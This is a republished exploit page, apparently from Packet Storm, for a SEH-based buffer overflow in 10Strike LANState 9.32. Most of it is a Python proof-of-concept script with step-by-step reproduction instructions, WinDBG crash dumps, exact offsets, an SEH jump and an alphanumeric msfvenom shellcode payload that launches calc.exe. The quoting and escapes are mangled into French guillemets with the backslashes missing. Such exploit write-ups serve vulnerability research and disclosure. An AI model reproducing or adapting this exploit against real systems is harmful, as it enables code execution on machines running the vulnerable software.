10Strike LANState 9.32 Host Check hostname Buffer Overflow ≈ Packet Storm


#!/usr/bin/python

# Exploit Title: 10Strike LANState – Host Check hostname Buffer Overflow (SEH)
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Date: 2020-04-01
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win7 x86 SP1 – Build 7601

# Description:
# – Exploits the « Force Check » option when listing the Host Checks in option « Check List ». Entering an overly long string, results in a crash which overwrites SEH.

# Reproduction:
# – Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP’s.
# – Run the script, a TXT file will be generated
# – On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# – Open LANState, use any « Map », for example the « demo_map »
# – Click on tab « Home », click option « Check List »
# – Rightclick on any existing hostname and click « Edit »
# – Paste the value from clipboard in the field « Host address (name) »
# – Next, Next, Finish
# – In the « List of checks » overview, select the modified host and press the spacebar (Force Check)
# – Check results

# WinDBG initial crash output using only A’s:
# (c5c.c2c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:Program Files10-Strike LANStateLANState.exe
# LANState+0x2e57:
# 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation – code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???

import sys,struct

# Filename
filename = « 10_strike_lanstate-poc.txt »

# Maximum length
maxlen = 10000

# Shellcode, using alphanum chars due to bytes considered to be bad above x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
shellcode = (
« xdbxdcxd9x74x24xf4x5bx53x59x49x49x49x49x49x49 »
« x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41 »
« x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42 »
« x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b »
« x4cx78x68x6dx52x65x50x37x70x77x70x43x50x4dx59 »
« x39x75x36x51x59x50x32x44x6ex6bx32x70x46x50x6e »
« x6bx70x52x34x4cx6ex6bx61x42x45x44x4cx4bx54x32 »
« x47x58x36x6fx6ex57x53x7ax66x46x46x51x79x6fx4e »
« x4cx37x4cx51x71x53x4cx44x42x44x6cx61x30x4ax61 »
« x68x4fx66x6dx73x31x49x57x59x72x58x72x30x52x56 »
« x37x4ex6bx52x72x34x50x6cx4bx33x7ax35x6cx6cx4b »
« x42x6cx57x61x74x38x6dx33x33x78x77x71x4bx61x32 »
« x71x6ex6bx51x49x77x50x76x61x6ax73x6ex6bx61x59 »
« x67x68x79x73x57x4ax42x69x4ex6bx37x44x6cx4bx43 »
« x31x4ex36x45x61x6bx4fx6cx6cx6ax61x48x4fx34x4d »
« x47x71x5ax67x37x48x39x70x62x55x4bx46x65x53x63 »
« x4dx39x68x67x4bx73x4dx46x44x53x45x79x74x76x38 »
« x4cx4bx63x68x66x44x43x31x48x53x72x46x4ex6bx76 »
« x6cx70x4bx4ex6bx61x48x57x6cx46x61x79x43x6cx4b »
« x54x44x6ex6bx57x71x68x50x6ex69x30x44x76x44x45 »
« x74x53x6bx61x4bx65x31x62x79x31x4ax30x51x39x6f »
« x59x70x63x6fx71x4fx50x5ax6cx4bx56x72x4ax4bx6c »
« x4dx73x6dx30x6ax77x71x6ex6dx4dx55x4ex52x37x70 »
« x75x50x63x30x52x70x63x58x56x51x4ex6bx42x4fx4e »
« x67x69x6fx49x45x4dx6bx58x70x4dx65x6dx72x50x56 »
« x75x38x6ex46x6fx65x6fx4dx6dx4dx39x6fx58x55x75 »
« x6cx63x36x73x4cx76x6ax6bx30x59x6bx4dx30x52x55 »
« x74x45x6fx4bx43x77x42x33x63x42x62x4fx51x7ax77 »
« x70x73x63x69x6fx58x55x72x43x30x61x72x4cx31x73 »
« x46x4ex45x35x63x48x63x55x47x70x41x41 »
)

# Offsets
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4

# Variables
nops = « x90 » * 16 # Nops

# Prefix
prefix = « A » * crash_nseh # Filler
nseh = « x71x06x70x04 » # JNO # JO # Jump over NSEH/SEH
seh = struct.pack(« <L », 0x0132730f) # call dword ptr ss:[ebp-04] # [LANState.exe]
suffix = nops # Old-school NOP’ing
suffix += shellcode # Magic!
suffix += « D » * (maxlen – len(prefix + nseh + seh + suffix)) # Filler

# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together

try:
file = open(filename, »wb »)
file.write(payload)
file.close()
print « [+] File  » + filename +  » with size  » + str(len(payload)) +  » created successfully »
except:
print « [!] Error creating file! »
sys.exit(0)



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *